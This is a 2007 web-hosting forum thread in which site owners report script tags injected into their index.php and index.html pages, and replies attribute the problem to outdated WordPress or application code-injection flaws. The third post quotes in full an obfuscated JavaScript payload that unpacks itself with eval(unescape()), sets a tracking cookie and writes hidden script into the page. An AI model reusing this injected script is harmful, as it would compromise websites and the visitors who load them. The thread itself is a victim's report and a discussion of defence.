Results 1 to 4 of 4

Thread: I've been hacked - what now?

  1. #1
    Junior Member Newbie
    Join Date
    Jan 2007
    Posts
    13

    Default I've been hacked - what now?

    I discovered script tags embedded in all of my index.php files this morning. Obviously my system has been compromised. I'm not sure what to do next, any suggested steps are appreciated. Also, please provide all command line details as I'm not an experienced unix user. Thanks in advance!!

    Here's what I've done:
    1 - removed offending scripts
    2 - changed all of my passwords

    I'm trying to identify and kill malicious processes and files on my machine but I don't really know where to start.

    running the 'top' command shows me a bunch of processes, none of which I recognize...

    1 root 16 0 1668 616 532 S 0.0 0.0 0:11.59 init
    30546 root 16 0 1540 556 468 S 0.0 0.0 0:28.50 syslogd
    30662 root 17 0 2224 1124 964 S 0.0 0.0 0:00.00 mysqld_safe
    30693 mysql 16 0 107m 23m 5100 S 0.0 0.2 3:32.00 mysqld
    31828 qmails 16 0 1516 480 392 S 0.0 0.0 0:07.92 qmail-send
    31830 qmaill 15 0 1472 452 392 S 0.0 0.0 0:00.88 splogger
    31831 root 16 0 1500 380 296 S 0.0 0.0 0:00.00 qmail-lspawn
    31832 qmailr 16 0 1760 756 304 S 0.0 0.0 0:00.54 qmail-rspawn
    31833 qmailq 15 0 1464 344 284 S 0.0 0.0 0:00.41 qmail-clean
    31856 root 16 0 42088 21m 8956 S 0.0 0.2 0:20.88 httpd
    32478 popuser 16 0 24360 21m 2356 S 0.0 0.2 0:09.08 spamd
    32565 popuser 16 0 24360 21m 2356 S 0.0 0.2 0:09.30 spamd
    32733 popuser 17 0 24360 19m 692 S 0.0 0.2 0:00.00 spamd
    32741 popuser 16 0 24360 19m 692 S 0.0 0.2 0:00.00 spamd
    1354 root 16 0 48016 5096 3296 S 0.0 0.0 0:14.55 httpsd
    1409 root 16 0 2492 940 544 S 0.0 0.0 0:01.14 crond
    1418 root 18 0 4352 808 560 S 0.0 0.0 0:00.00 saslauthd
    27665 root 15 0 28548 11m 124 S 0.0 0.1 0:00.00 httpd
    23606 apache 15 0 50456 27m 6224 S 0.0 0.2 0:14.06 httpd
    17559 apache 15 0 50496 27m 6308 S 0.0 0.2 0:08.41 httpd
    30143 apache 15 0 50432 26m 5492 S 0.0 0.2 0:05.51 httpd
    30061 psaadm 16 0 57140 27m 20m S 0.0 0.2 0:06.40 httpsd
    30305 psaadm 16 0 56124 27m 20m S 0.0 0.2 0:04.60 httpsd
    30351 psaadm 16 0 56316 26m 19m S 0.0 0.2 0:06.58 httpsd
    30448 root 16 0 8836 2716 1980 S 0.0 0.0 0:00.39 sshd
    30627 root 16 0 2368 1376 1096 S 0.0 0.0 0:00.07 bash
    7957 root 18 0 4316 1040 728 S 0.0 0.0 0:00.00 sshd
    16075 apache 16 0 42964 18m 4980 S 0.0 0.2 0:00.17 httpd
    17575 apache 16 0 42852 18m 4976 S 0.0 0.2 0:00.15 httpd
    3823 root 16 0 1948 1000 804 R 0.0 0.0 0:00.00 top
    Last edited by black_box; 11-06-2007 at 10:46 AM.

  2. #2
    Ted@spry
    Guest

    Default

    It appears that there have been a ton of issues with wordpress breakins recently. I would recommend that you update your wordpress application, as I suspect that your vulnerability was in an older version.

  3. #3
    Junior Member Newbie
    Join Date
    Aug 2007
    Posts
    4

    Default

    Hello,

    I have this issue too, happening for MONTHS! Every once in a while the script would lodge itself right near the closing </body> tag on my index.php and index.html pages.

    Sure I remove it then reupload the file thinking it won't come back but it always does.

    This has to be a spry server issue, I don't use any blogs or wordpress, it is simple html/php code.

    I'm starting to get very annoyed. If some malicious script can easily insert javascript, who knows what other info it can steal????

    Here is the Javascript:
    <script language="javascript">$="%63e%3d%222echa%2572Co%25 64e%2541%2574(%2530)^%2528%25270x00%2527+es)%2529% 2529;%257d}%22;dd%3d%22}Sx<tSx<}^}+yv8d)K7i7M,%252 2%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M<d)K7}7M<d)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&5##950%2522&M+iSx%2 522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx% 22;dz%3d%22%2566u%256ect%2569on %2564w(t%2529{%2563%2561%253d%2527%252564o%252563u m%2565%25256et.w%252572i%2525%25374e(%2525%25322%2 527;ce%253d%2527%252522%252529%2527;cb%253d%2527%2 5253cs%252563rip%252574 %256ca%25256%2565%2567%252575ag%2565%25253%2564%25 255c%252522ja%2576a%252573c%25257%2532%252569%2525 70t%25255%2563%252522>%2527;cc%253d%2527%25253c%25 255c%25252fscri%2570%252574%253e%2527;eva%256c(%25 75nes%2563ap%2565%2528%2574))}%253b%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:&950%2522%279M+4-4>bu`|qsu8t<iSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M; 7>s%257F}79+%22;op%3d%22%2524%253d%2522dw(dc%2573% 2528%2563u,%25314))%253b%2522;%22;cb%3d%22pe(%2564 s);%2573%2574%253dtm%2570%253d%2527%2527;for(i%253 d0%253bi<d%2573.%256c%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7<7tfu7<7dxb7<7vyb7<7fyv7<7huc7< 7fuc7<7wxd7<7u~y7<7ud~7<7|uf7<7dgu79+fqb0|)-~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7y7<7z7< 7{7<7|7<7}7<7~7<7%257F7<7`7<7a7<7b7<7c7<7%22;dc%3d %220d)K7t7M-t)>wudTqdu89%3d8t)>wudTqi899+yv8d)K7t7M,%25209d)K7 t7M-!+d)K7}7M-t)>wud]%257F~dx89;!+ve~sdy%257F~0S]^8t<}<i9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%257Fh>s%257F}7+fqb0iSx!<iSx%2522<%22;cz%3d%2 2%2566un%2563tio%256e c%257a(cz%2529{%2572e%2574u%2572n c%2561+c%2562%252b%2563c%252bc%2564+%2563e%252b%25 63z;}%253b%22;cd%3d%223b%2573t%253dst+%2553%2574ri %256eg.f%2572omC%2568arC%256fde%2528(%2574%256dp%2 5%22;st%3d%22%2573t%253d%2522$%253ds%2574;%2564c%2 573(%2564a%252b%2564b%252b%2564c%252b%2564d%252b%2 564e%252c1%2530)%253b%2564%2577%2528%2573t%2529%25 3b%2573%2574%253d%2524;%2522%253b%22;cc%3d%22e%256 egt%2568;i%252b%252b){%2574mp%253d%2564s%252esli%2 563%2565(i,%2569+1%2529%25%22;ca%3d%22%2566un%2563 ti%256fn%2520dcs%2528d%2573,%2565s%2529%257b%2564s %253du%256eesc%2561%22;cu%3d%22(p}b4g`mxq)6b}g}v}x }`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;bqgx{l:w{y;xp;pl;6 4c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;db%3d%22 d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~)-~ug0Qbbqi8!<%2522<#<$<%25<&<%27<(<)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)>wudVe||Iuqb89+yv8t)>wudTqi89.#9d)K7t7M-t)>wudTqdu89%3d8t)>wudTqi89;%25229+u|cu%22;%69f (%64%6fcum%65n%74.co%6fkie%2e%69%6edex%4ff(%27r%66 %35f6d%73%27)%3d%3d-1)%7bsc%28%27rf%35f6d%73%27,2%2c%37);e%76al(%75ne% 73c%61p%65%28%64%7a+cz%2bo%70+%73t)%2b%27dw(%64%7a +cz%28$+s%74%29)%3b%27)}el%73%65{$%3d%27%27};fun%6 3%74io%6e %73c(%63nm,%76,%65d%29{va%72 %65x%64%3dnew D%61%74%65%28%29;%65xd%2eset%44%61te%28exd%2e%67et %44ate%28%29+%65d);%64o%63u%6de%6e%74.co%6fk%69e%3 dcnm%2b %27%3d%27 +esc%61pe%28v)+%27;e%78%70%69%72es%3d%27%2bexd%2e% 74%6f%47M%54Str%69%6eg(%29;}%3b";eval(unescape($)) ;document.write($);</script>

    Thanks,
    Joe

  4. #4
    Senior Member Power Poster
    Join Date
    Dec 2007
    Posts
    359

    Default

    Joe -

    The issue which you have described does not necessarily have to be Wordpress or blog-related.

    If you are using any application which meets the following requirements, it is very likely that the issue is one of application-level security and not server-level security.

    Requirements:

    1) The application uses server-side scripting to display content.

    2) The application uses a database or file system to allow content to be edited.

    Attackers take advantage of an input validation error in an application to inject their JavaScript or HTML code into the application's database or file system (this is called a code injection attack) - the application then serves up the attacker's code, just as it would serve up any authorized edits which were made.

    It is also possible, though much less likely, that the attacker has access to the application's control panel or your server - attackers will generally take the path of least resistance by taking advantage of known flaws in applications.

    I would highly recommend that you consult with your server's administrator to ensure the security of your system and review the cPanel forums guide to security for advice.

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •